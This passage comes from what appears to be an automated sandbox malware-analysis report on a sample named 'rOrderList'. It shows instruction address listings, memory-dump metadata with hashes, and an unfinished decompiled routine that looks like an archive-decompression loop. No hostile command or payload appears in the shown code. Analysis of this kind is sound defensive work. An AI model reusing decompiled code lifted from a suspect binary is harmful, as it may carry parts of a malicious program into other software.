                                                                                      0x0040704a
                                                                                      0x0040704d
                                                                                      0x00407050
                                                                                      0x00407045
                                                                                      0x00407045
                                                                                      0x00407045
                                                                                      0x00407053
                                                                                      0x00407056
                                                                                      0x00407059
                                                                                      0x00407059
                                                                                      0x0040705c
                                                                                      0x0040705f
                                                                                      0x00407062
                                                                                      0x00407062
                                                                                      0x00407065
                                                                                      0x0040706c
                                                                                      0x00407071
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070ff
                                                                                      0x004070ff
                                                                                      0x00407103
                                                                                      0x004074a1
                                                                                      0x004074a1
                                                                                      0x00000000
                                                                                      0x004074a1
                                                                                      0x00407109
                                                                                      0x00407109
                                                                                      0x0040710c
                                                                                      0x0040710f
                                                                                      0x00407113
                                                                                      0x00407116
                                                                                      0x0040711c
                                                                                      0x0040711e
                                                                                      0x0040711e
                                                                                      0x0040711e
                                                                                      0x00407121
                                                                                      0x00407124
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406cf4
                                                                                      0x00406cf4
                                                                                      0x00406cf8
                                                                                      0x00407465
                                                                                      0x00407465
                                                                                      0x00000000
                                                                                      0x00407465
                                                                                      0x00406cfe
                                                                                      0x00406cfe
                                                                                      0x00406d01
                                                                                      0x00406d04
                                                                                      0x00406d08
                                                                                      0x00406d0b
                                                                                      0x00406d11
                                                                                      0x00406d13
                                                                                      0x00406d13
                                                                                      0x00406d13
                                                                                      0x00406d16
                                                                                      0x00406d19
                                                                                      0x00406d19
                                                                                      0x00406d1c
                                                                                      0x00406d1f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d25
                                                                                      0x00406d25
                                                                                      0x00406d2b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d31
                                                                                      0x00406d31
                                                                                      0x00406d35
                                                                                      0x00406d38
                                                                                      0x00406d3b
                                                                                      0x00406d3e
                                                                                      0x00406d41
                                                                                      0x00406d42
                                                                                      0x00406d45
                                                                                      0x00406d47
                                                                                      0x00406d4d
                                                                                      0x00406d50
                                                                                      0x00406d53
                                                                                      0x00406d56
                                                                                      0x00406d59
                                                                                      0x00406d5c
                                                                                      0x00406d5f
                                                                                      0x00406d7b
                                                                                      0x00406d7e
                                                                                      0x00406d81
                                                                                      0x00406d84
                                                                                      0x00406d8b
                                                                                      0x00406d8f
                                                                                      0x00406d91
                                                                                      0x00406d95
                                                                                      0x00406d61
                                                                                      0x00406d61
                                                                                      0x00406d65
                                                                                      0x00406d6d
                                                                                      0x00406d72
                                                                                      0x00406d74
                                                                                      0x00406d76
                                                                                      0x00406d76
                                                                                      0x00406d98
                                                                                      0x00406d9f
                                                                                      0x00406da2
                                                                                      0x00000000
                                                                                      0x00406da8
                                                                                      0x00406da8
                                                                                      0x00000000
                                                                                      0x00406da8
                                                                                      0x00000000
                                                                                      0x00406dad
                                                                                      0x00406dad
                                                                                      0x00406db1
                                                                                      0x00407471
                                                                                      0x00407471
                                                                                      0x00000000
                                                                                      0x00407471
                                                                                      0x00406db7
                                                                                      0x00406db7
                                                                                      0x00406dba
                                                                                      0x00406dbd
                                                                                      0x00406dc1
                                                                                      0x00406dc4
                                                                                      0x00406dca
                                                                                      0x00406dcc
                                                                                      0x00406dcc
                                                                                      0x00406dcc
                                                                                      0x00406dcf
                                                                                      0x00406dd2
                                                                                      0x00406dd2
                                                                                      0x00406dd2
                                                                                      0x00406dd8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406dda
                                                                                      0x00406dda
                                                                                      0x00406ddd
                                                                                      0x00406de0
                                                                                      0x00406de3
                                                                                      0x00406de6
                                                                                      0x00406de9
                                                                                      0x00406dec
                                                                                      0x00406def
                                                                                      0x00406df2
                                                                                      0x00406df5
                                                                                      0x00406df8
                                                                                      0x00406e10
                                                                                      0x00406e13
                                                                                      0x00406e16
                                                                                      0x00406e19
                                                                                      0x00406e19
                                                                                      0x00406e1c
                                                                                      0x00406e20
                                                                                      0x00406e22
                                                                                      0x00406dfa
                                                                                      0x00406dfa
                                                                                      0x00406e02
                                                                                      0x00406e07
                                                                                      0x00406e09
                                                                                      0x00406e0b
                                                                                      0x00406e0b
                                                                                      0x00406e25
                                                                                      0x00406e2c
                                                                                      0x00406e2f
                                                                                      0x00000000
                                                                                      0x00406e31
                                                                                      0x00406e31
                                                                                      0x00000000
                                                                                      0x00406e31
                                                                                      0x00406e2f
                                                                                      0x00406e36
                                                                                      0x00406e36
                                                                                      0x00406e36
                                                                                      0x00406e36
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e71
                                                                                      0x00406e71
                                                                                      0x00406e75
                                                                                      0x0040747d
                                                                                      0x0040747d
                                                                                      0x00000000
                                                                                      0x0040747d
                                                                                      0x00406e7b
                                                                                      0x00406e7b
                                                                                      0x00406e7e
                                                                                      0x00406e81
                                                                                      0x00406e85
                                                                                      0x00406e88
                                                                                      0x00406e8e
                                                                                      0x00406e90
                                                                                      0x00406e90
                                                                                      0x00406e90
                                                                                      0x00406e93
                                                                                      0x00406e96
                                                                                      0x00406e96
                                                                                      0x00406e9c
                                                                                      0x00406e3a
                                                                                      0x00406e3a
                                                                                      0x00406e3d
                                                                                      0x00000000
                                                                                      0x00406e3d
                                                                                      0x00406e9e
                                                                                      0x00406e9e
                                                                                      0x00406ea1
                                                                                      0x00406ea4
                                                                                      0x00406ea7
                                                                                      0x00406eaa
                                                                                      0x00406ead
                                                                                      0x00406eb0
                                                                                      0x00406eb3
                                                                                      0x00406eb6
                                                                                      0x00406eb9
                                                                                      0x00406ebc
                                                                                      0x00406ed4
                                                                                      0x00406ed7
                                                                                      0x00406eda
                                                                                      0x00406edd
                                                                                      0x00406edd
                                                                                      0x00406ee0
                                                                                      0x00406ee4
                                                                                      0x00406ee6
                                                                                      0x00406ebe
                                                                                      0x00406ebe
                                                                                      0x00406ec6
                                                                                      0x00406ecb
                                                                                      0x00406ecd
                                                                                      0x00406ecf
                                                                                      0x00406ecf
                                                                                      0x00406ee9
                                                                                      0x00406ef0
                                                                                      0x00406ef3
                                                                                      0x00000000
                                                                                      0x00406ef5
                                                                                      0x00406ef5
                                                                                      0x00000000
                                                                                      0x00406ef5
                                                                                      0x00000000
                                                                                      0x00407182
                                                                                      0x00407182
                                                                                      0x00407186
                                                                                      0x004074ad
                                                                                      0x004074ad
                                                                                      0x00000000
                                                                                      0x004074ad
                                                                                      0x0040718c
                                                                                      0x0040718c
                                                                                      0x0040718f
                                                                                      0x00407192
                                                                                      0x00407196
                                                                                      0x00407199
                                                                                      0x0040719f
                                                                                      0x004071a1
                                                                                      0x004071a1
                                                                                      0x004071a1
                                                                                      0x004071a4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f52
                                                                                      0x00406f52
                                                                                      0x00406f55
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407291
                                                                                      0x00407291
                                                                                      0x00407295
                                                                                      0x004072b7
                                                                                      0x004072b7
                                                                                      0x004072ba
                                                                                      0x004072c4
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x00000000
                                                                                      0x004072c7
                                                                                      0x00407297
                                                                                      0x00407297
                                                                                      0x0040729a
                                                                                      0x0040729e
                                                                                      0x004072a1
                                                                                      0x004072a1
                                                                                      0x004072a4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040734e
                                                                                      0x0040734e
                                                                                      0x00407352
                                                                                      0x00407370
                                                                                      0x00407370
                                                                                      0x00407370
                                                                                      0x00407370
                                                                                      0x00407377
                                                                                      0x0040737e
                                                                                      0x00407385
                                                                                      0x00407385
                                                                                      0x0040738c
                                                                                      0x0040738f
                                                                                      0x00407396
                                                                                      0x00000000
                                                                                      0x00407399
                                                                                      0x00407354
                                                                                      0x00407354
                                                                                      0x00407357
                                                                                      0x0040735a
                                                                                      0x0040735d
                                                                                      0x00407364
                                                                                      0x004072a8
                                                                                      0x004072a8
                                                                                      0x004072ab
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040743f
                                                                                      0x0040743f
                                                                                      0x00407442
                                                                                      0x00407343
                                                                                      0x00407343
                                                                                      0x00407343
                                                                                      0x00000000
                                                                                      0x00407349
                                                                                      0x00000000
                                                                                      0x00407079
                                                                                      0x00407079
                                                                                      0x0040707b
                                                                                      0x00407082
                                                                                      0x00407083
                                                                                      0x00407085
                                                                                      0x00407088
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040738c
                                                                                      0x0040738c
                                                                                      0x0040738f
                                                                                      0x00407396
                                                                                      0x00000000
                                                                                      0x00407399
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070be
                                                                                      0x004070be
                                                                                      0x004070c1
                                                                                      0x004070f7
                                                                                      0x004070f7
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x0040722a
                                                                                      0x0040722a
                                                                                      0x0040722d
                                                                                      0x0040722f
                                                                                      0x004074b9
                                                                                      0x004074b9
                                                                                      0x00000000
                                                                                      0x004074b9
                                                                                      0x00407235
                                                                                      0x00407235
                                                                                      0x00407238
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040723e
                                                                                      0x0040723e
                                                                                      0x00407242
                                                                                      0x00407245
                                                                                      0x00407245
                                                                                      0x00407245
                                                                                      0x00000000
                                                                                      0x00407245
                                                                                      0x004070c3
                                                                                      0x004070c3
                                                                                      0x004070c5
                                                                                      0x004070c7
                                                                                      0x004070c9
                                                                                      0x004070cc
                                                                                      0x004070cd
                                                                                      0x004070cf
                                                                                      0x004070d1
                                                                                      0x004070d4
                                                                                      0x004070d7
                                                                                      0x004070ed
                                                                                      0x004070ed
                                                                                      0x004070f2
                                                                                      0x0040712a
                                                                                      0x0040712a
                                                                                      0x0040712e
                                                                                      0x00407157
                                                                                      0x0040715a
                                                                                      0x0040715c
                                                                                      0x00407163
                                                                                      0x00407166
                                                                                      0x00407169
                                                                                      0x00407169
                                                                                      0x0040716e
                                                                                      0x0040716e
                                                                                      0x00407170
                                                                                      0x00407173
                                                                                      0x0040717a
                                                                                      0x0040717d
                                                                                      0x004071aa
                                                                                      0x004071aa
                                                                                      0x004071ad
                                                                                      0x004071b0
                                                                                      0x00407224
                                                                                      0x00407224
                                                                                      0x00407224
                                                                                      0x00407224
                                                                                      0x00000000
                                                                                      0x00407224
                                                                                      0x004071b2
                                                                                      0x004071b2
                                                                                      0x004071b8
                                                                                      0x004071bb
                                                                                      0x004071be
                                                                                      0x004071c1
                                                                                      0x004071c4
                                                                                      0x004071c7
                                                                                      0x004071ca
                                                                                      0x004071cd
                                                                                      0x004071d0
                                                                                      0x004071d3
                                                                                      0x004071ec
                                                                                      0x004071ee
                                                                                      0x004071f1
                                                                                      0x004071f2
                                                                                      0x004071f5
                                                                                      0x004071f7
                                                                                      0x004071fa
                                                                                      0x004071fc
                                                                                      0x004071fe
                                                                                      0x00407201
                                                                                      0x00407203
                                                                                      0x00407206
                                                                                      0x0040720a
                                                                                      0x0040720c
                                                                                      0x0040720c
                                                                                      0x0040720d
                                                                                      0x00407210
                                                                                      0x00407213
                                                                                      0x004071d5
                                                                                      0x004071d5
                                                                                      0x004071dd
                                                                                      0x004071e2
                                                                                      0x004071e4
                                                                                      0x004071e7
                                                                                      0x004071e7
                                                                                      0x00407216
                                                                                      0x0040721d
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x00000000
                                                                                      0x0040721f
                                                                                      0x0040721f
                                                                                      0x00000000
                                                                                      0x0040721f
                                                                                      0x0040721d
                                                                                      0x00407130
                                                                                      0x00407130
                                                                                      0x00407133
                                                                                      0x00407135
                                                                                      0x00407138
                                                                                      0x0040713b
                                                                                      0x0040713e
                                                                                      0x00407140
                                                                                      0x00407143
                                                                                      0x00407146
                                                                                      0x00407146
                                                                                      0x00407149
                                                                                      0x00407149
                                                                                      0x0040714c
                                                                                      0x00407153
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00000000
                                                                                      0x00407155
                                                                                      0x00407155
                                                                                      0x00000000
                                                                                      0x00407155
                                                                                      0x00407153
                                                                                      0x004070d9
                                                                                      0x004070d9
                                                                                      0x004070dc
                                                                                      0x004070de
                                                                                      0x004070e1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e40
                                                                                      0x00406e40
                                                                                      0x00406e44
                                                                                      0x00407489
                                                                                      0x00407489
                                                                                      0x00000000
                                                                                      0x00407489
                                                                                      0x00406e4a
                                                                                      0x00406e4a
                                                                                      0x00406e4d
                                                                                      0x00406e50
                                                                                      0x00406e53
                                                                                      0x00406e56
                                                                                      0x00406e59
                                                                                      0x00406e5c
                                                                                      0x00406e5e
                                                                                      0x00406e61
                                                                                      0x00406e64
                                                                                      0x00406e67
                                                                                      0x00406e69
                                                                                      0x00406e69
                                                                                      0x00406e69
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406fcb
                                                                                      0x00406fcb
                                                                                      0x00406fcf
                                                                                      0x00407495
                                                                                      0x00407495
                                                                                      0x00000000
                                                                                      0x00407495
                                                                                      0x00406fd5
                                                                                      0x00406fd5
                                                                                      0x00406fd8
                                                                                      0x00406fdb
                                                                                      0x00406fde
                                                                                      0x00406fe0
                                                                                      0x00406fe0
                                                                                      0x00406fe0
                                                                                      0x00406fe3
                                                                                      0x00406fe6
                                                                                      0x00406fe9
                                                                                      0x00406fec
                                                                                      0x00406fef
                                                                                      0x00406ff2
                                                                                      0x00406ff3
                                                                                      0x00406ff5
                                                                                      0x00406ff5
                                                                                      0x00406ff5
                                                                                      0x00406ff8
                                                                                      0x00406ffb
                                                                                      0x00406ffe
                                                                                      0x00407001
                                                                                      0x00407001
                                                                                      0x00407001
                                                                                      0x00407004
                                                                                      0x00407006
                                                                                      0x00407006
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407248
                                                                                      0x00407248
                                                                                      0x00407248
                                                                                      0x0040724c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407252
                                                                                      0x00407252
                                                                                      0x00407255
                                                                                      0x00407258
                                                                                      0x0040725b
                                                                                      0x0040725d
                                                                                      0x0040725d
                                                                                      0x0040725d
                                                                                      0x00407260
                                                                                      0x00407263
                                                                                      0x00407266
                                                                                      0x00407269
                                                                                      0x0040726c
                                                                                      0x0040726f
                                                                                      0x00407270
                                                                                      0x00407272
                                                                                      0x00407272
                                                                                      0x00407272
                                                                                      0x00407275
                                                                                      0x00407278
                                                                                      0x0040727b
                                                                                      0x0040727e
                                                                                      0x00407281
                                                                                      0x00407285
                                                                                      0x00407287
                                                                                      0x0040728a
                                                                                      0x00000000
                                                                                      0x0040728c
                                                                                      0x0040728c
                                                                                      0x00407009
                                                                                      0x00407009
                                                                                      0x00000000
                                                                                      0x00407009
                                                                                      0x0040728a
                                                                                      0x004074bf
                                                                                      0x004074bf
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406aee
                                                                                      0x004074f6
                                                                                      0x004074f6
                                                                                      0x00000000
                                                                                      0x004074f6
                                                                                      0x00407343
                                                                                      0x004073c3
                                                                                      0x0040738c

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 32b4e55e20c06e4ab42ecec14c412173dc536429d2dc8db053d5bec18c4e9e97
                                                                                      • Instruction ID: a7b8be33b9a7519416cae36d16977938a601532f9034d24a777c3823dc36e66c
                                                                                      • Opcode Fuzzy Hash: 32b4e55e20c06e4ab42ecec14c412173dc536429d2dc8db053d5bec18c4e9e97
                                                                                      • Instruction Fuzzy Hash: F7A14571D04229CBDB28CFA8C854BADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 98%
                                                                                      			E00407291() {
                                                                                      				void _t533;
                                                                                      				signed int _t534;
                                                                                      				signed int _t535;
                                                                                      				signed int* _t605;
                                                                                      				void* _t612;
                                                                                      
                                                                                      				L0:
                                                                                      				while(1) {
                                                                                      					L0:
                                                                                      					if( *(_t612 - 0x40) != 0) {
                                                                                      						 *(_t612 - 0x84) = 0x13;
                                                                                      						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                                                      						goto L132;
                                                                                      					} else {
                                                                                      						__eax =  *(__ebp - 0x4c);
                                                                                      						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                      						__ecx =  *(__ebp - 0x58);
                                                                                      						__eax =  *(__ebp - 0x4c) << 4;
                                                                                      						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                      						L130:
                                                                                      						 *(__ebp - 0x58) = __eax;
                                                                                      						 *(__ebp - 0x40) = 3;
                                                                                      						L144:
                                                                                      						 *(__ebp - 0x7c) = 0x14;
                                                                                      						L145:
                                                                                      						__eax =  *(__ebp - 0x40);
                                                                                      						 *(__ebp - 0x50) = 1;
                                                                                      						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                      						L149:
                                                                                      						if( *(__ebp - 0x48) <= 0) {
                                                                                      							__ecx =  *(__ebp - 0x40);
                                                                                      							__ebx =  *(__ebp - 0x50);
                                                                                      							0 = 1;
                                                                                      							__eax = 1 << __cl;
                                                                                      							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                      							__eax =  *(__ebp - 0x7c);
                                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                                      							while(1) {
                                                                                      								L140:
                                                                                      								 *(_t612 - 0x88) = _t533;
                                                                                      								while(1) {
                                                                                      									L1:
                                                                                      									_t534 =  *(_t612 - 0x88);
                                                                                      									if(_t534 > 0x1c) {
                                                                                      										break;
                                                                                      									}
                                                                                      									switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
                                                                                      										case 0:
                                                                                      											if( *(_t612 - 0x6c) == 0) {
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                      											_t534 =  *( *(_t612 - 0x70));
                                                                                      											if(_t534 > 0xe1) {
                                                                                      												goto L171;
                                                                                      											}
                                                                                      											_t538 = _t534 & 0x000000ff;
                                                                                      											_push(0x2d);
                                                                                      											asm("cdq");
                                                                                      											_pop(_t569);
                                                                                      											_push(9);
                                                                                      											_pop(_t570);
                                                                                      											_t608 = _t538 / _t569;
                                                                                      											_t540 = _t538 % _t569 & 0x000000ff;
                                                                                      											asm("cdq");
                                                                                      											_t603 = _t540 % _t570 & 0x000000ff;
                                                                                      											 *(_t612 - 0x3c) = _t603;
                                                                                      											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                                                      											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                                                      											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                                                      											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                                                      												L10:
                                                                                      												if(_t611 == 0) {
                                                                                      													L12:
                                                                                      													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                                                      													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                      													goto L15;
                                                                                      												} else {
                                                                                      													goto L11;
                                                                                      												}
                                                                                      												do {
                                                                                      													L11:
                                                                                      													_t611 = _t611 - 1;
                                                                                      													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                                                      												} while (_t611 != 0);
                                                                                      												goto L12;
                                                                                      											}
                                                                                      											if( *(_t612 - 4) != 0) {
                                                                                      												GlobalFree( *(_t612 - 4));
                                                                                      											}
                                                                                      											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                      											 *(_t612 - 4) = _t534;
                                                                                      											if(_t534 == 0) {
                                                                                      												goto L171;
                                                                                      											} else {
                                                                                      												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                                                      												goto L10;
                                                                                      											}
                                                                                      										case 1:
                                                                                      											L13:
                                                                                      											__eflags =  *(_t612 - 0x6c);
                                                                                      											if( *(_t612 - 0x6c) == 0) {
                                                                                      												 *(_t612 - 0x88) = 1;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                      											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                                                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                      											_t45 = _t612 - 0x48;
                                                                                      											 *_t45 =  *(_t612 - 0x48) + 1;
                                                                                      											__eflags =  *_t45;
                                                                                      											L15:
                                                                                      											if( *(_t612 - 0x48) < 4) {
                                                                                      												goto L13;
                                                                                      											}
                                                                                      											_t546 =  *(_t612 - 0x40);
                                                                                      											if(_t546 ==  *(_t612 - 0x74)) {
                                                                                      												L20:
                                                                                      												 *(_t612 - 0x48) = 5;
                                                                                      												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                                                      												goto L23;
                                                                                      											}
                                                                                      											 *(_t612 - 0x74) = _t546;
                                                                                      											if( *(_t612 - 8) != 0) {
                                                                                      												GlobalFree( *(_t612 - 8));
                                                                                      											}
                                                                                      											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                                                      											 *(_t612 - 8) = _t534;
                                                                                      											if(_t534 == 0) {
                                                                                      												goto L171;
                                                                                      											} else {
                                                                                      												goto L20;
                                                                                      											}
                                                                                      										case 2:
                                                                                      											L24:
                                                                                      											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                                                      											 *(_t612 - 0x84) = 6;
                                                                                      											 *(_t612 - 0x4c) = _t553;
                                                                                      											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                                                      											goto L132;
                                                                                      										case 3:
                                                                                      											L21:
                                                                                      											__eflags =  *(_t612 - 0x6c);
                                                                                      											if( *(_t612 - 0x6c) == 0) {
                                                                                      												 *(_t612 - 0x88) = 3;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                      											_t67 = _t612 - 0x70;
                                                                                      											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                                                      											__eflags =  *_t67;
                                                                                      											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                      											L23:
                                                                                      											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                                                      											if( *(_t612 - 0x48) != 0) {
                                                                                      												goto L21;
                                                                                      											}
                                                                                      											goto L24;
                                                                                      										case 4:
                                                                                      											L133:
                                                                                      											_t531 =  *_t605;
                                                                                      											_t588 = _t531 & 0x0000ffff;
                                                                                      											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                                                      											if( *(_t612 - 0xc) >= _t564) {
                                                                                      												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                                                      												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                                                      												 *(_t612 - 0x40) = 1;
                                                                                      												_t532 = _t531 - (_t531 >> 5);
                                                                                      												__eflags = _t532;
                                                                                      												 *_t605 = _t532;
                                                                                      											} else {
                                                                                      												 *(_t612 - 0x10) = _t564;
                                                                                      												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                      												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                                                      											}
                                                                                      											if( *(_t612 - 0x10) >= 0x1000000) {
                                                                                      												goto L139;
                                                                                      											} else {
                                                                                      												goto L137;
                                                                                      											}
                                                                                      										case 5:
                                                                                      											L137:
                                                                                      											if( *(_t612 - 0x6c) == 0) {
                                                                                      												 *(_t612 - 0x88) = 5;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                      											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                      											L139:
                                                                                      											_t533 =  *(_t612 - 0x84);
                                                                                      											goto L140;
                                                                                      										case 6:
                                                                                      											__edx = 0;
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x34) = 1;
                                                                                      												 *(__ebp - 0x84) = 7;
                                                                                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                      												goto L132;
                                                                                      											}
                                                                                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                      											__esi =  *(__ebp - 0x60);
                                                                                      											__cl = 8;
                                                                                      											__cl = 8 -  *(__ebp - 0x3c);
                                                                                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                      											__ecx =  *(__ebp - 0x3c);
                                                                                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                      											__ecx =  *(__ebp - 4);
                                                                                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                      											__eflags =  *(__ebp - 0x38) - 4;
                                                                                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      											if( *(__ebp - 0x38) >= 4) {
                                                                                      												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                      												if( *(__ebp - 0x38) >= 0xa) {
                                                                                      													_t98 = __ebp - 0x38;
                                                                                      													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                      													__eflags =  *_t98;
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                      												}
                                                                                      											} else {
                                                                                      												 *(__ebp - 0x38) = 0;
                                                                                      											}
                                                                                      											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                      											if( *(__ebp - 0x34) == __edx) {
                                                                                      												__ebx = 0;
                                                                                      												__ebx = 1;
                                                                                      												goto L61;
                                                                                      											} else {
                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
